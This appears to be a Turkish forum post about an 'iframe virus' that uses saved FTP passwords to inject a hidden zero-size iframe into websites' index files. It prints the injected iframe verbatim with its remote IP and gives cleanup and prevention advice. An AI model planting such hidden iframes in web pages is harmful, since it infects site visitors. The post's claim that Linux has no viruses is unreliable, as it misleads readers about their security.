Clubturk.net - Türkiye'nin Bilgi Kaynağı

Virüs'ün çalışma mantığı:
Virüs bazı sitelerden (bu siteler özellikle virüs yayan sitelerde olabilir) sizin bilgisayarınıza bulaşır. Buradanda sizin ftp bilgilerinizi ve ftp programınızı kullanarak sitenize erişim sağlar. Sitenizde ismi index.php, index.htm, index.html olan dosyalara kendisini kopyalıyor. Böylece hem sitenin yazı karakterlerinde bozulma oluyor hem de siteye giren bilgisayarlara virüs bulaştırıyor. Virüs'ün çalışma mantığı:
Virüs bazı sitelerden (bu siteler özellikle virüs yayan sitelerde olabilir) sizin bilgisayarınıza bulaşır. Buradanda sizin ftp bilgilerinizi ve ftp programınızı kullanarak sitenize erişim sağlar. Sitenizde ismi index.php, index.htm, index.html olan dosyalara kendisini kopyalıyor. Böylece hem sitenin yazı karakterlerinde bozulma oluyor hem de siteye giren bilgisayarlara virüs bulaştırıyor.

Virüsün sitenize eklediği kod yapısı
Virüs sitenize aşağıdaki yapıda bir kod ekliyor.

<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Virüsten korunma yolları
1. Güncel bir antivirüs kullanın. Önerim: Kaspersky, nod32v4, antivir.

2. Kullandığınız ftp programında(örn.filezilla, cuteftp vb.) ftp bilgilerinizi kayıtlı olarak tutmayın. Yani Programda işiniz bittikten sonra geçmişi temizleyin ve bilgilerinizin programda tutulmadığından emin olun. Yani otomatik giriş özelliğini varsa iptal edin. Virüs sizin programda kayıtlı parolalarınızı kullanarak sitenize erişim sağlıyor. Virüsün keyloger(tuş kaydetme) özelliği yok. Direk kayıtlı parolayı kullanıyor.

3. Belirli zaman periyotlarıyla ftp parolanızı değiştirin.

Virüs Bulaşmışsa Kurtulma Yolları

1. Öncelikle ftp kullanıcı adınızı ve parolasını değiştirin.

2. Anti-virüs programınızı güncelleyin.

3. Eğer son günlerde sitenizde önemli güncellemeler yapmadıysanız ve fazla miktarda veri girmediyseniz hosting şirketine mail atın ve virüs bulaşmadan önceki bir tarihteki yedeklerinizi yükletin. Mantık olarak son günlerde veri girmiş olsanız bile virüs veri tabanına bulaşmadığı için önceki yedekleri yükletmeniz verilerin kaybolmasına neden olmaz diye düşünüyorum ama siz her ihtimale karşı veritabanı yedeğinizi alın.

4. Eğer 3. adımı uygulamayıp virüsü elle tek tek temizlemek isterseniz ki uzun ve zahmetli bir iştir. Sitenizin dosyalarını bilgisayarınıza ftp ile çekin.

5. İndex.php ve index html dosyarınızdan yukarıda verdiğim virüsün kodlarını silin. Kodları dosya içinde arama kriteriniz 81.95.145.240 ip numarası olabilir.

6. Virüsü temizledikten sonra dosyalarınızı tekrar hosta yolların. Böylece virüssüz bir siteye kavuşursunuz. En son işinizi garantiye almak için ftp parolanızı değiştirin.

Not: Virüs'ün joomlanın 1.0.x versiyonundan kaynaklandığına dair yanlış inanışlar var. Bu virüs joomla'nın 1.5.x sürümlerine de bulaşabildiği gibi html ve asp bir siteye de bulaşabilir.

Öneriler: Linux işletim sistemi kullanmanızdır. Linuxlardan ise tavsiye ettiğim Linux sürümü Ulusal işletim sistemiz PARDUS'tur. Çünkü linux platformunda virüs olayı yok bu yüzden siteye iframe virüsünün ve diğer virüs ve trojanların bulaşma olasılığı yok denecek kadar az. Çok uzun zamandır PARDUS kullanıyorum herhangi bir virüs vakasıyla karşılaşmadım.

Web tarayıcı olarakta firefox kullanırsanız biraz olsun zararlılardan kurtulmuş olursunuz. Saygılarımla